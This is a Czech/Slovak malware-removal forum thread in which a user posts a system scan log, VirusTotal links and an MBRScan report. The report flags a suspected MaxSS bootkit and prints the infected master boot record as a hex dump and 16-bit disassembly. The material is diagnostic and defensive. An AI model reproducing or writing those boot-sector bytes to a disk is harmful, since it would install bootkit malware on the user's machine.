2012-07-18 12:59:50 ----HD---- C:\WINDOWS\inf
2012-07-18 12:57:56 ----D---- C:\WINDOWS\SoftwareDistribution
2012-07-18 12:57:33 ----D---- C:\Documents and Settings\Monička\Application Data\Winamp
2012-07-18 12:57:15 ----SHD---- C:\WINDOWS\Temporary Internet Files
2012-07-18 12:18:07 ----D---- C:\Program Files\FlashFXP 4
2012-07-18 12:13:28 ----A---- C:\WINDOWS\system32\FlashPlayerApp.exe
2012-07-18 11:58:31 ----D---- C:\Qoobox
2012-07-18 11:43:23 ----A---- C:\WINDOWS\system.ini
2012-07-18 11:38:03 ----DC---- C:\WINDOWS\system32\dllcache
2012-07-18 11:25:13 ----D---- C:\WINDOWS\AppPatch
2012-07-18 11:25:11 ----D---- C:\Program Files\Common Files
2012-07-18 11:07:36 ----D---- C:\Documents and Settings\Monička\Application Data\Skype
2012-07-18 11:07:33 ----D---- C:\WINDOWS\Minidump
2012-07-18 10:52:18 ----D---- C:\WINDOWS\system32\CatRoot
2012-07-18 10:47:22 ----D---- C:\WINDOWS\system32\config
2012-07-18 10:46:03 ----D---- C:\WINDOWS\system32\wbem
2012-07-18 10:45:57 ----D---- C:\WINDOWS\Registration
2012-07-18 10:45:20 ----D---- C:\Documents and Settings\Monička\Application Data\dvdcss
2012-07-18 10:39:37 ----D---- C:\Documents and Settings\Monička\Application Data\GetRightToGo
2012-07-18 10:37:34 ----D---- C:\Documents and Settings
2012-07-17 22:48:24 ----D---- C:\WINDOWS\Prefetch
2012-07-16 15:06:07 ----D---- C:\Documents and Settings\Monička\Application Data\ICQ
2012-07-14 19:03:10 ----D---- C:\WINDOWS\Logs
2012-07-14 19:03:10 ----D---- C:\WINDOWS\Debug
2012-07-12 13:20:57 ----D---- C:\Program Files\RapidShareManager
2012-07-11 17:20:07 ----HD---- C:\WINDOWS\$hf_mig$
2012-07-11 17:19:51 ----D---- C:\Documents and Settings\All Users\Application Data\Microsoft Help
2012-07-11 17:19:36 ----A---- C:\WINDOWS\win.ini
2012-07-11 17:19:34 ----D---- C:\Program Files\Common Files\System
2012-07-05 22:28:59 ----A---- C:\WINDOWS\NeroDigital.ini
2012-06-28 06:33:19 ----D---- C:\Program Files\LogMeIn Hamachi
2012-06-26 06:08:26 ----D---- C:\WINDOWS\Help
2012-06-25 18:30:42 ----D---- C:\WINDOWS\WinSxS
2012-06-25 18:29:58 ----D---- C:\WINDOWS\system32\DirectX
2012-06-25 18:29:24 ----RSD---- C:\WINDOWS\assembly
2012-06-25 18:17:23 ----D---- C:\Program Files\Ubisoft
2012-06-25 18:17:21 ----HD---- C:\Program Files\InstallShield Installation Information
2012-06-25 11:11:33 ----A---- C:\WINDOWS\system32\PnkBstrB.exe
2012-06-25 11:04:08 ----D---- C:\Documents and Settings\Monička\Application Data\Ubisoft
2012-06-25 11:02:34 ----D---- C:\Documents and Settings\All Users\Application Data\Ubisoft
2012-06-25 06:56:15 ----A---- C:\WINDOWS\BlendSettings.ini
2012-06-24 22:55:05 ----D---- C:\WINDOWS\security
2012-06-19 14:59:17 ----D---- C:\Documents and Settings\Monička\Application Data\Media Player Classic

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 cmderd;COMODO Internet Security Eradication Driver; C:\WINDOWS\System32\DRIVERS\cmderd.sys [2012-03-11 18056]
R1 cmdGuard;COMODO Internet Security Sandbox Driver; C:\WINDOWS\System32\DRIVERS\cmdguard.sys [2012-03-11 494968]
R1 cmdHlp;COMODO Internet Security Helper Driver; C:\WINDOWS\System32\DRIVERS\cmdhlp.sys [2012-03-11 31704]
R1 easdrv;easdrv; C:\WINDOWS\system32\DRIVERS\easdrv.sys [2008-07-01 53256]
R1 epfwtdir;epfwtdir; C:\WINDOWS\system32\DRIVERS\epfwtdir.sys [2008-07-01 34312]
R1 intelppm;Intel Processor Driver; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-13 36352]
R1 WS2IFSL;Windows Socket 2.0 Non-IFS Service Provider Support Environment; C:\WINDOWS\System32\drivers\ws2ifsl.sys [2001-08-23 12032]
R2 cpuz135;cpuz135; \??\C:\WINDOWS\system32\drivers\cpuz135_x32.sys []
R2 eamon;EAMON; C:\WINDOWS\system32\DRIVERS\eamon.sys [2008-07-01 39944]
R2 TBPanel;TBPanel; C:\WINDOWS\system32\drivers\TBPanel.sys [2007-03-16 12256]
R3 hamachi;Hamachi Network Interface; C:\WINDOWS\system32\DRIVERS\hamachi.sys [2009-03-18 26176]
R3 HDAudBus;Microsoft UAA Bus Driver for High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RtkHDAud.sys [2008-02-14 4676096]
R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2008-09-11 6128352]
R3 pcouffin;VSO Software pcouffin; C:\WINDOWS\System32\Drivers\pcouffin.sys [2010-03-13 47360]
R3 pfc;Padus ASPI Shell; C:\WINDOWS\system32\drivers\pfc.sys [2003-11-11 9856]
R3 RTLE8023xp;Realtek 10/100/1000 PCI-E NIC Family NDIS XP Driver; C:\WINDOWS\system32\DRIVERS\Rtenicxp.sys [2008-01-03 105856]
R3 usbehci;Microsoft USB 2.0 Enhanced Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
R3 usbhub;Microsoft USB Standard Hub Driver; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
R3 usbstor;USB Mass Storage Driver; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
R3 usbuhci;Microsoft USB Universal Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-13 20608]
S3 aasde6iw;aasde6iw; C:\WINDOWS\system32\drivers\aasde6iw.sys []
S3 Cardex;Cardex; \??\C:\WINDOWS\system32\drivers\TBPANEL.SYS []
S3 catchme;catchme; \??\C:\DOCUME~1\MONIKA~1\LOCALS~1\Temp\catchme.sys []
S3 gdrv;gdrv; \??\C:\WINDOWS\gdrv.sys []
S3 HidUsb;Microsoft HID Class Driver; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
S3 MarvinBus;Pinnacle Marvin Bus; C:\WINDOWS\system32\DRIVERS\MarvinBus.sys [2005-09-23 171520]
S3 nmwcd;Nokia USB Phone Parent Driver; C:\WINDOWS\system32\drivers\ccdcmb.sys [2011-08-17 18176]
S3 nmwcdc;Nokia USB Communication Driver; C:\WINDOWS\system32\drivers\ccdcmbo.sys [2011-08-17 23168]
S3 upperdev;upperdev; C:\WINDOWS\system32\DRIVERS\usbser_lowerflt.sys [2011-08-17 8192]
S3 usbccgp;Microsoft USB Generic Parent Driver; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
S3 usbprint;Microsoft USB PRINTER Class; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-13 25856]
S3 usbscan;USB Scanner Driver; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-13 15104]
S3 usbser;USB Modem Driver; C:\WINDOWS\system32\drivers\usbser.sys [2008-04-13 26112]
S3 UsbserFilt;UsbserFilt; C:\WINDOWS\system32\DRIVERS\usbser_lowerfltj.sys [2011-08-17 8192]
S3 Wdf01000;Wdf01000; C:\WINDOWS\system32\DRIVERS\Wdf01000.sys [2009-07-14 444136]
S3 WpdUsb;WpdUsb; C:\WINDOWS\System32\Drivers\wpdusb.sys [2005-01-28 18944]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 Bonjour Service;##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762##; C:\Program Files\Bonjour\mDNSResponder.exe [2006-02-28 229376]
R2 CLPSLS;COMODO livePCsupport Service; C:\Program Files\COMODO\COMODO GeekBuddy\CLPSLS.exe [2011-11-23 1052472]
R2 cmdAgent;COMODO Internet Security Helper Service; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [2012-03-11 1983232]
R2 ekrn;Eset Service; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [2008-07-01 468224]
R2 FirebirdGuardianDefaultInstance;Firebird Guardian - DefaultInstance; C:\Program Files\Firebird\Firebird_2_1\bin\fbguard.exe [2007-10-16 81920]
R2 Hamachi2Svc;LogMeIn Hamachi Tunneling Engine; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [2012-06-27 1385896]
R2 ICQ Service;ICQ Service; C:\Program Files\ICQ6Toolbar\ICQ Service.exe [2008-06-10 222456]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2011-11-10 153376]
R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2008-09-11 163908]
R2 PnkBstrA;PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [2011-04-16 75136]
R2 StarWindServiceAE;StarWind AE Service; C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [2009-12-23 370688]
R2 UMWdf;Windows User Mode Driver Framework; C:\WINDOWS\system32\wdfmgr.exe [2005-01-28 38912]
R2 wlidsvc;Windows Live ID Sign-in Assistant; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2009-08-18 1529728]
R3 FirebirdServerDefaultInstance;Firebird Server - DefaultInstance; C:\Program Files\Firebird\Firebird_2_1\bin\fbserver.exe [2007-10-16 2711552]
S2 gupdate;Google Update Service (gupdate); C:\Program Files\Google\Update\GoogleUpdate.exe [2011-06-13 135664]
S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [2009-06-23 72704]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-07-18 250056]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2008-07-25 34312]
S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2008-07-25 69632]
S3 EhttpSrv;Eset HTTP Server; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [2008-07-01 19200]
S3 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2009-06-24 654848]
S3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe [2008-07-29 46104]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files\Google\Update\GoogleUpdate.exe [2011-06-13 135664]
S3 idsvc;Windows CardSpace; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2008-07-29 881664]
S3 Microsoft Office Groove Audit Service;Microsoft Office Groove Audit Service; C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe [2009-02-26 64856]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2011-07-20 440696]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S4 NetTcpPortSharing;Net.Tcp Port Sharing Service; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2008-07-29 132096]

-----------------EOF-----------------

Re: virus nejde odstranit antivirom

Napsal: 18 črc 2012 14:44
od hunterwx
prepac nevedel som ze sa nemoze s combom robit nakolko mne to pomohlo vzdy a nemusel som otravovat potom takto a mne sem nejde vlozit ten log z comba ze tam je velky pocet znakov ako to sem mam vlozit? vypise mi to pokazde Vaše zpráva obsahuje 162310 znaků. Maximální povolený počet znaků je 80000. a k tomu vyrusu ja vobec neviem kde je presne umiestneny ani ako sa vola celkovo len viem ze mi to pokafralo pc tak ze mi zmyzli vsetky ikonky ces nudzový rezim som dal obnovu no antivirak mi ukazal ze trojsky kon nelze vylecit nic viac k tomu neviem pardon

naozaj uz neviem ako to sem mam vlozit skusim na dva krat alebo mam znova spravit ten log alebo ho mam uploadnut niekde?

Re: virus nejde odstranit antivirom

Napsal: 18 črc 2012 15:02
od hunterwx
no ja ten report nemam kedze mne sa hned resetol pocitac a ten report mi zmyzol :( a doteraz sa neobjavil aj ten prvy krat sa objavil az po nejakych 2 hodinach tak teraz len trpnem kedy mi to znova spravi.. :( bez toho sa to nejako neda ? prepac ze mas take trapenie s tym velmi sa ti ospravedlnujem za vzniknute problemy a slubujem ze comba sa bez odporucania uz ani nedotknem

Re: virus nejde odstranit antivirom

Napsal: 18 črc 2012 15:42
od hunterwx
c:\windows\explorer.exe
https://www.virustotal.com/file/8c7e8bc ... /analysis/


c:\windows\regedit.exe
https://www.virustotal.com/file/06cb6f4 ... /analysis/


c:\windows\system32\xcdzip32.dll
https://www.virustotal.com/file/cf84342 ... /analysis/

c:\windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\oisicon.exe
https://www.virustotal.com/file/094a403 ... /analysis/

Kód: Vybrat vše

MBRScan v1.1.1

OS             : Windows XP Home Service Pack 3 (32 bit)
PROCESSOR      : x86 Family 6 Model 23 Stepping 6, GenuineIntel
BOOT           : Normal Boot
DATE           : 2012/07/18 (ISO 8601) at 16:33:56
________________________________________________________________________________

DISK           : Device\Harddisk0\DR0 __SAMSUNG HD322HJ (1AC01113)
BUS_TYPE       : (0x03)  P-ATA
USE_PIO        : YES
MAX_TRANSFER   : 128 Kb
ALIGNMENT_MASK : word aligned
________________________________________________________________________________

Device\Harddisk0\DR0	298.1 Go  [Fixed] ==> Possible MaxSS.sst MBR Code

MBR_MD5   : 7EBCF55B858704D10A1A02FDC8671F16
MBR_SHA1  : 813651AC57C241F5DBA0DB83B58D46BBF1F7DA4B

Device\Harddisk0\Partition1	146.5 Go  	0x07 NTFS / HPFS __ BOOTABLE __
Device\Harddisk0\Partition2	151.6 Go  	0x07 NTFS / HPFS
________________________________________________________________________________

############################### Additional scan ################################

SystemStartOptions : NOEXECUTE=OPTIN  FASTDETECT

________________________________________________________________________________

_____FAKED   \Device\Harddisk0\DR0  

0x00000000   31 C0 8E D0 BC 00 7C 0E 1F 0E 07 66 60 88 16 00   1À.м.|....f`...
0x00000010   7E C6 06 04 7E 1E B4 48 BE 04 7E CD 13 B0 50 0F   ~Æ..~.´H¾.~Í.°P.
0x00000020   82 7B 01 81 2E 13 04 14 00 A1 13 04 C1 E0 06 A3   .{.......¡..Áà.£
0x00000030   02 7E 81 EC 0E 00 68 10 00 89 E5 BE A1 7D B9 05   .~.ì..h...御}¹.
0x00000040   00 66 31 DB E8 F8 00 FF 36 02 7E 07 8C 46 06 8C   .f1Ûèø..6.~..F..
0x00000050   5E 04 E8 09 00 81 C4 10 00 66 61 06 1E CB 66 60   ^.è...Ä..fa..Ëf`
0x00000060   57 66 FF 36 14 7E 66 8F 46 08 66 FF 36 18 7E 66   Wf.6.~f.F.f.6.~f
0x00000070   8F 46 0C 66 8B 45 10 66 40 66 29 46 08 66 19 5E   .F.f.E.f@f)F.f.^
0x00000080   0C 8B 45 14 89 46 02 B4 42 8A 16 00 7E 89 EE CD   ..E..F.´B...~.îÍ
0x00000090   13 B0 52 0F 82 07 01 31 C0 BA 04 04 BE B2 7D 88   .°R....1Àº..¾²}.
0x000000A0   9F 42 7E FE C3 75 F8 8A 8F 42 7E 02 04 E8 7E 00   .B~þÃuø..B~..è~.
0x000000B0   46 FE CE 75 04 29 D6 88 D6 FE C3 75 EA 31 C0 89   FþÎu.)Ö.ÖþÃuê1À.
0x000000C0   C3 8B 56 02 C1 E2 09 8B 76 04 FE C3 8A 8F 42 7E   Ã.V.Áâ..v.þÃ..B~
0x000000D0   E8 5B 00 00 E9 30 ED 89 CF 8A 8D 42 7E 26 30 0C   è[..é0í.Ï..B~&0.
0x000000E0   46 4A 75 E6 5F 66 8B 4D 18 66 0F B7 56 04 81 F9   FJuæ_f.M.f.·V..ù
0x000000F0   FF 7F B0 53 0F 87 A6 00 66 FF 75 1C 66 31 C0 66   ..°S..¦.f.u.f1Àf
0x00000100   89 45 1C 66 F7 D0 26 67 32 02 66 42 B3 08 66 D1   .E.f÷Ð&g2.fB³.fÑ
0x00000110   E8 73 06 66 35 20 83 B8 ED FE CB 75 F1 E2 E7 66   ès.f5 .¸íþËuñâçf
0x00000120   F7 D0 66 5B 66 39 D8 B0 43 75 73 66 61 C3 00 C8   ÷Ðf[f9Ø°CusfaÃ.È
0x00000130   89 C7 8A AD 42 7E 88 AF 42 7E 88 8D 42 7E C3 66   .Ç.­B~.¯B~..B~Ãf
0x00000140   60 BF 00 80 8C 4E 06 89 7E 04 66 89 D8 40 89 45   `¿...N..~.f.Ø@.E
0x00000150   14 66 0F B7 06 B6 7D 66 89 45 10 B8 20 00 E8 FD   .f.·.¶}f.E.¸ .èý
0x00000160   FE 8B 7E 04 8B 55 18 FC 60 F3 A6 81 7D FE 5C 00   þ.~..U.ü`ó¦.}þ\.
0x00000170   74 0E E3 0E 61 01 C7 29 C2 77 ED B0 4E E9 1E 00   t.ã.a.Ç)Âwí°Né..
0x00000180   41 4E 5F 81 C4 0E 00 60 89 FE BF 22 7E 59 57 89   AN_.Ä..`.þ¿"~YW.
0x00000190   C1 F3 A4 61 E3 03 E9 C5 FF 59 57 66 61 C3 F4 EB   Áó¤aã.éÅ.YWfaÃôë
0x000001A0   FD 5C 62 6F 6F 74 00 00 00 00 00 00 00 00 00 00   ý\boot..........
0x000001B0   00 00 A8 D3 17 78 BF F6 BA 41 BB 41 00 00 80 01   ..¨Ó.x¿öºA»A....
0x000001C0   01 00 07 FE FF FF 3F 00 00 00 F3 6B 4F 12 00 00   ...þ..?...ókO...
0x000001D0   C1 FF 0F FE FF FF 32 6C 4F 12 CE 2B F3 12 00 00   Á..þ..2lO.Î+ó...
0x000001E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001F0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA   ..............Uª

__ORIGINAL   \Device\Harddisk0\DR0  

0x00000000   33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 1B 7C   3À.м.|ûP.P.ü¾.|
0x00000010   BF 1B 06 50 57 B9 E5 01 F3 A4 CB BD BE 07 B1 04   ¿..PW¹å.ó¤Ë½¾.±.
0x00000020   38 6E 00 7C 09 75 13 83 C5 10 E2 F4 CD 18 8B F5   8n.|.u..Å.âôÍ..õ
0x00000030   83 C6 10 49 74 19 38 2C 74 F6 A0 B5 07 B4 07 8B   .Æ.It.8,tö.µ.´..
0x00000040   F0 AC 3C 00 74 FC BB 07 00 B4 0E CD 10 EB F2 88   ð¬<.tü»..´.Í.ëò.
0x00000050   4E 10 E8 46 00 73 2A FE 46 10 80 7E 04 0B 74 0B   N.èF.s*þF..~..t.
0x00000060   80 7E 04 0C 74 05 A0 B6 07 75 D2 80 46 02 06 83   .~..t..¶.uÒ.F...
0x00000070   46 08 06 83 56 0A 00 E8 21 00 73 05 A0 B6 07 EB   F...V..è!.s..¶.ë
0x00000080   BC 81 3E FE 7D 55 AA 74 0B 80 7E 10 00 74 C8 A0   ¼.>þ}Uªt..~..tÈ.
0x00000090   B7 07 EB A9 8B FC 1E 57 8B F5 CB BF 05 00 8A 56   ·.ë©.ü.W.õË¿...V
0x000000A0   00 B4 08 CD 13 72 23 8A C1 24 3F 98 8A DE 8A FC   .´.Í.r#.Á$?..Þ.ü
0x000000B0   43 F7 E3 8B D1 86 D6 B1 06 D2 EE 42 F7 E2 39 56   C÷ã.Ñ.Ö±.ÒîB÷â9V
0x000000C0   0A 77 23 72 05 39 46 08 73 1C B8 01 02 BB 00 7C   .w#r.9F.s.¸..».|
0x000000D0   8B 4E 02 8B 56 00 CD 13 73 51 4F 74 4E 32 E4 8A   .N..V.Í.sQOtN2ä.
0x000000E0   56 00 CD 13 EB E4 8A 56 00 60 BB AA 55 B4 41 CD   V.Í.ëä.V.`»ªU´AÍ
0x000000F0   13 72 36 81 FB 55 AA 75 30 F6 C1 01 74 2B 61 60   .r6.ûUªu0öÁ.t+a`
0x00000100   6A 00 6A 00 FF 76 0A FF 76 08 6A 00 68 00 7C 6A   j.j..v..v.j.h.|j
0x00000110   01 6A 10 B4 42 8B F4 CD 13 61 61 73 0E 4F 74 0B   .j.´B.ôÍ.aas.Ot.
0x00000120   32 E4 8A 56 00 CD 13 EB D6 61 F9 C3 49 6E 76 61   2ä.V.Í.ëÖaùÃInva
0x00000130   6C 69 64 20 70 61 72 74 69 74 69 6F 6E 20 74 61   lid partition ta
0x00000140   62 6C 65 00 45 72 72 6F 72 20 6C 6F 61 64 69 6E   ble.Error loadin
0x00000150   67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74   g operating syst
0x00000160   65 6D 00 4D 69 73 73 69 6E 67 20 6F 70 65 72 61   em.Missing opera
0x00000170   74 69 6E 67 20 73 79 73 74 65 6D 00 00 00 00 00   ting system.....
0x00000180   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00000190   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001A0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001B0   00 00 00 00 00 2C 44 63 BA 41 BB 41 00 00 80 01   .....,DcºA»A....
0x000001C0   01 00 07 FE FF FF 3F 00 00 00 F3 6B 4F 12 00 00   ...þ..?...ókO...
0x000001D0   C1 FF 0F FE FF FF 32 6C 4F 12 CE 2B F3 12 00 00   Á..þ..2lO.Î+ó...
0x000001E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001F0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA   ..............Uª

__________________________16_BIT_ASM_CODE
   
0x0000    31c0            XOR AX, AX   
0x0002    8ed0            MOV SS, AX   
0x0004    bc 007c         MOV SP, 0x7c00   
0x0007    0e              PUSH CS   
0x0008    1f              POP DS   
0x0009    0e              PUSH CS   
0x000A    07              POP ES   
0x000B    66 60           PUSHAD   
0x000D    8816 007e       MOV [0x7e00], DL   
0x0011    c606 047e 1e    MOV BYTE [0x7e04], 0x1e   
0x0016    b4 48           MOV AH, 0x48   
0x0018    be 047e         MOV SI, 0x7e04   
0x001B    cd 13           INT 0x13   
0x001D    b0 50           MOV AL, 0x50   
0x001F    0f82 7b01       JB 0x19e   
0x0023    812e 1304 1400  SUB WORD [0x413], 0x14   
0x0029    a1 1304         MOV AX, [0x413]   
0x002C    c1e0 06         SHL AX, 0x6   
0x002F    a3 027e         MOV [0x7e02], AX   
0x0032    81ec 0e00       SUB SP, 0xe   
0x0036    68 1000         PUSH 0x10   
0x0039    89e5            MOV BP, SP   
0x003B    be a17d         MOV SI, 0x7da1   
0x003E    b9 0500         MOV CX, 0x5   
0x0041    66 31db         XOR EBX, EBX   
0x0044    e8 f800         CALL 0x13f   
0x0047    ff36 027e       PUSH WORD [0x7e02]   
0x004B    07              POP ES   
0x004C    8c46 06         MOV WORD [BP+0x6], ES   
0x004F    8c5e 04         MOV WORD [BP+0x4], DS   
0x0052    e8 0900         CALL 0x5e   
0x0055    81c4 1000       ADD SP, 0x10   
0x0059    66 61           POPAD   
0x005B    06              PUSH ES   
0x005C    1e              PUSH DS   
0x005D    cb              RETF   
0x005E    66 60           PUSHAD   
0x0060    57              PUSH DI   
0x0061    66 ff36 147e    PUSH DWORD [0x7e14]   
0x0066    66 8f46 08      POP DWORD [BP+0x8]   
0x006A    66 ff36 187e    PUSH DWORD [0x7e18]   
0x006F    66 8f46 0c      POP DWORD [BP+0xc]   
0x0073    66 8b45 10      MOV EAX, [DI+0x10]   
0x0077    66 40           INC EAX   
0x0079    66 2946 08      SUB [BP+0x8], EAX   
0x007D    66 195e 0c      SBB [BP+0xc], EBX   
0x0081    8b45 14         MOV AX, [DI+0x14]   
0x0084    8946 02         MOV [BP+0x2], AX   
0x0087    b4 42           MOV AH, 0x42   
0x0089    8a16 007e       MOV DL, [0x7e00]   
0x008D    89ee            MOV SI, BP   
0x008F    cd 13           INT 0x13   
0x0091    b0 52           MOV AL, 0x52   
0x0093    0f82 0701       JB 0x19e   
0x0097    31c0            XOR AX, AX   
0x0099    ba 0404         MOV DX, 0x404   
0x009C    be b27d         MOV SI, 0x7db2   
0x009F    889f 427e       MOV [BX+0x7e42], BL   
0x00A3    fec3            INC BL   
0x00A5    75 f8           JNZ 0x9f   
0x00A7    8a8f 427e       MOV CL, [BX+0x7e42]   
0x00AB    0204            ADD AL, [SI]   
0x00AD    e8 7e00         CALL 0x12e   
0x00B0    46              INC SI   
0x00B1    fece            DEC DH   
0x00B3    75 04           JNZ 0xb9   
0x00B5    29d6            SUB SI, DX   
0x00B7    88d6            MOV DH, DL   
0x00B9    fec3            INC BL   
0x00BB    75 ea           JNZ 0xa7   
0x00BD    31c0            XOR AX, AX   
0x00BF    89c3            MOV BX, AX   
0x00C1    8b56 02         MOV DX, [BP+0x2]   
0x00C4    c1e2 09         SHL DX, 0x9   
0x00C7    8b76 04         MOV SI, [BP+0x4]   
0x00CA    fec3            INC BL   
0x00CC    8a8f 427e       MOV CL, [BX+0x7e42]   
0x00D0    e8 5b00         CALL 0x12e   
0x00D3    00e9            ADD CL, CH   
0x00D5    30ed            XOR CH, CH   
0x00D7    89cf            MOV DI, CX   
0x00D9    8a8d 427e       MOV CL, [DI+0x7e42]   
0x00DD    26 300c         XOR ES:[SI], CL   
0x00E0    46              INC SI   
0x00E1    4a              DEC DX   
0x00E2    75 e6           JNZ 0xca   
0x00E4    5f              POP DI   
0x00E5    66 8b4d 18      MOV ECX, [DI+0x18]   
0x00E9    66 0fb756 04    MOVZX EDX, [BP+0x4]   
0x00EE    81f9 ff7f       CMP CX, 0x7fff   
0x00F2    b0 53           MOV AL, 0x53   
0x00F4    0f87 a600       JA 0x19e   
0x00F8    66 ff75 1c      PUSH DWORD [DI+0x1c]   
0x00FC    66 31c0         XOR EAX, EAX   
0x00FF    66 8945 1c      MOV [DI+0x1c], EAX   
0x0103    66 f7d0         NOT EAX   
0x0106    26 67 3202      XOR AL, ES:[EDX]   
0x010A    66 42           INC EDX   
0x010C    b3 08           MOV BL, 0x8   
0x010E    66 d1e8         SHR EAX, 0x1   
0x0111    73 06           JAE 0x119   
0x0113    66 35 2083b8ed  XOR EAX, 0xedb88320   
0x0119    fecb            DEC BL   
0x011B    75 f1           JNZ 0x10e   
0x011D    e2 e7           LOOP 0x106   
0x011F    66 f7d0         NOT EAX   
0x0122    66 5b           POP EBX   
0x0124    66 39d8         CMP EAX, EBX   
0x0127    b0 43           MOV AL, 0x43   
0x0129    75 73           JNZ 0x19e   
0x012B    66 61           POPAD   
0x012D    c3              RET   
0x012E    00c8            ADD AL, CL   
0x0130    89c7            MOV DI, AX   
0x0132    8aad 427e       MOV CH, [DI+0x7e42]   
0x0136    88af 427e       MOV [BX+0x7e42], CH   
0x013A    888d 427e       MOV [DI+0x7e42], CL   
0x013E    c3              RET   
0x013F    66 60           PUSHAD   
0x0141    bf 0080         MOV DI, 0x8000   
0x0144    8c4e 06         MOV WORD [BP+0x6], CS   
0x0147    897e 04         MOV [BP+0x4], DI   
0x014A    66 89d8         MOV EAX, EBX   
0x014D    40              INC AX   
0x014E    8945 14         MOV [DI+0x14], AX   
0x0151    66 0fb706 b67d  MOVZX EAX, [0x7db6]   
0x0157    66 8945 10      MOV [DI+0x10], EAX   
0x015B    b8 2000         MOV AX, 0x20   
0x015E    e8 fdfe         CALL 0x5e   
0x0161    8b7e 04         MOV DI, [BP+0x4]   
0x0164    8b55 18         MOV DX, [DI+0x18]   
0x0167    fc              CLD   
0x0168    60              PUSHA   
0x0169    f3 a6           REP CMPSB   
0x016B    817d fe 5c00    CMP WORD [DI-0x2], 0x5c   
0x0170    74 0e           JZ 0x180   
0x0172    e3 0e           JCXZ 0x182   
0x0174    61              POPA   
0x0175    01c7            ADD DI, AX   
0x0177    29c2            SUB DX, AX   
0x0179    77 ed           JA 0x168   
0x017B    b0 4e           MOV AL, 0x4e   
0x017D    e9 1e00         JMP 0x19e   
0x0180    41              INC CX   
0x0181    4e              DEC SI   
0x0182    5f              POP DI   
0x0183    81c4 0e00       ADD SP, 0xe   
0x0187    60              PUSHA   
0x0188    89fe            MOV SI, DI   
0x018A    bf 227e         MOV DI, 0x7e22   
0x018D    59              POP CX   
0x018E    57              PUSH DI   
0x018F    89c1            MOV CX, AX   
0x0191    f3 a4           REP MOVSB   
0x0193    61              POPA   
0x0194    e3 03           JCXZ 0x199   
0x0196    e9 c5ff         JMP 0x15e   
0x0199    59              POP CX   
0x019A    57              PUSH DI   
0x019B    66 61           POPAD   
0x019D    c3              RET   
0x019E    f4              HLT   
0x019F    eb fd           JMP 0x19e   
0x01A1    5c              POP SP   
0x01A2    626f 6f         BOUND BP, [BX+0x6f]   
0x01A5    74 00           JZ 0x1a7   
0x01A7    0000            ADD [BX+SI], AL   
0x01A9    0000            ADD [BX+SI], AL   
0x01AB    0000            ADD [BX+SI], AL   
0x01AD    0000            ADD [BX+SI], AL   
0x01AF    0000            ADD [BX+SI], AL   
0x01B1    00a8 d317       ADD [BX+SI+0x17d3], CH   
0x01B5    78 bf           JS 0x176   
